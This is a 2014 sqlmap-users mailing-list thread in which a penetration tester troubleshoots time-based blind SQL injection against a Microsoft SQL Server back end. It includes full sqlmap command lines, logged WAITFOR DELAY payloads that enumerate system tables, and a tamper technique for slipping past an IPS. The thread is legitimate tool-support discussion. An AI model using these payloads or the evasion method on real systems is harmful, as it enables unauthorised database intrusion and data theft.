well, about the column, it is possible, I think, use the
> -D DB DBMS database to enumerate
> -T TBL DBMS database table(s) to enumerate
> -C COL DBMS database table column(s) to enumerate
> -X EXCLUDECOL DBMS database table column(s) to not enumerate
> -U USER DBMS user to enumerate
I really think the -C will search your column. There are a brutal force for
common column (or was table?) Anyway, set your colum and it will accept.
2014-09-25 10:17 GMT-03:00 floyd <floyd_...@yahoo.de>:
> Hi Miroslav
>
> Thanks for your time and for sqlmap. I hope you got the donation :)
>
> By now I figured out what it was: an IPS. Had to
> --tamper=caseselect,charencode where caseselect is just a simple
> .replace("SELECT","sElEcT"). What a stupid IPS.
>
> Is there any way to correct errors that sqlmap is getting? I sometimes
> have an extra character at the end of table names and would like to
> correct that.
>
> And: Is there a possibility to tell sqlmap manually, which columns a
> table has? That would be very helpful for blind time based, because,
> well, it takes forever :)
>
> Btw. awesome resume feature on ^C !
>
> Best,
> floyd
>
> On 24/09/14 13:03, Miroslav Stampar wrote:
> > Hi.
> >
> > This looks like a permission problem while reading system tables. That
> > would explain why DB_NAME() works and everything else fails.
> >
> > Bye
> >
> > On Sep 23, 2014 4:27 PM, "floyd" <floyd_...@yahoo.de
> > <mailto:floyd_...@yahoo.de>> wrote:
> >
> > Hi everybody
> >
> > I'm doing a Pentest and I'm able to do a time based blind sql
> injection
> > on a very big database.
> >
> > It takes some time, but that's fine for now. But sqlmap is failing
> when
> > it comes to retrieving the *number of [databases, tables, columns,
> > whatever]*:
> >
> > $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p
> "redactedParameter"
> > --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
> > Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
> > --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
> > --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
> > [...snip...]
> > [11:57:49] [INFO] confirming Microsoft SQL Server
> > [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
> > web server operating system: Windows
> > web application technology: ASP.NET <http://ASP.NET>, ASP.NET
> > <http://ASP.NET> 2.X.XXXXX (redacted)
> > back-end DBMS: Microsoft SQL Server 2008
> > [11:57:49] [INFO] fetching database names
> > [11:57:49] [INFO] fetching number of databases
> > [11:57:49] [WARNING] multi-threading is considered unsafe in
> time-based
> > data retrieval. Going to switch it off automatically
> > [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> > master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
> > [11:57:49] [WARNING] time-based comparison requires larger
> statistical
> > model, please wait..............................
> > [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> > master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
> > [11:58:25] [WARNING] it is very important not to stress the network
> > adapter during usage of time-based payloads to prevent potential
> errors
> > [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> > master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
> > [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> > master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
> > [11:59:55] [INFO] retrieved:
> > [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
> > [11:59:55] [WARNING] in case of continuous data retrieval problems
> you
> > are advised to try a switch '--no-cast' or switch '--hex'
> > [11:59:55] [ERROR] unable to retrieve the number of databases
> >
> > However, for the *database names* sqlmap will continue with the
> > DB_NAME(X) technique. Right now it is dumping out all the different
> > database names, which works fine:
> >
> > [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> > ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
> > WAITFOR DELAY '0:0:2'; --
> >
> > Because I got many of the following errors (and the occurence of the
> > error is random), I patched the time delay in the python code to be
> > fixed to 2 seconds (maybe you want to have an option for that):
> >
> > [15:03:14] [ERROR] invalid character detected. retrying..
> > [15:03:14] [WARNING] increasing time delay to 3 seconds
> >
> > That works fine and I get good results. However, when I try to dump
> > table names now (from one of the known databases) with the -D DB_NAME
> > and --tables switch, it is again failing to retrieve the number of
> > tables:
> >
> > [14:51:53] [INFO] fetching tables for database: DB_NAME
> > [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
> > [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> > NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> > WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
> > WAITFOR DELAY '0:0:10'; --
> > [14:51:53] [WARNING] time-based comparison requires larger
> statistical
> > model, please wait..............................
> > [14:52:26] [CRITICAL] considerable lagging has been detected in
> > connection response(s). Please use as high value for option
> '--time-sec'
> > as possible (e.g. 10 or more)
> > [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> > NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> > WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
> > WAITFOR DELAY '0:0:10'; --
> > [14:52:56] [WARNING] it is very important not to stress the network
> > adapter during usage of time-based payloads to prevent potential
> errors
> > [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> > NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> > WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
> > WAITFOR DELAY '0:0:10'; --
> > [14:54:56] [INFO] retrieved:
> > [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
> > [...]
> > [14:57:27] [INFO] retrieved:
> > [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
> > [...]
> > [14:59:57] [INFO] retrieved:
> > [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
> > [14:59:57] [WARNING] unable to retrieve the number of tables for
> > database 'DB_NAME'
> > [14:59:57] [CRITICAL] unable to retrieve the tables for any database
> >
> > Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
> > help. Using --start and --stop also didn't work. I can't get any data
> > out of it like this.
> >
> > Best regards,
> > floyd
> >
> >
>
> ------------------------------------------------------------------------------
> > Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> > Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS
> Reports
> > Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> > Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
> >
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> > _______________________________________________
> > sqlmap-users mailing list
> > sqlmap-users@lists.sourceforge.net
> > <mailto:sqlmap-users@lists.sourceforge.net>
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> ------------------------------------------------------------------------------
> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
------------------------------------------------------------------------------
Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
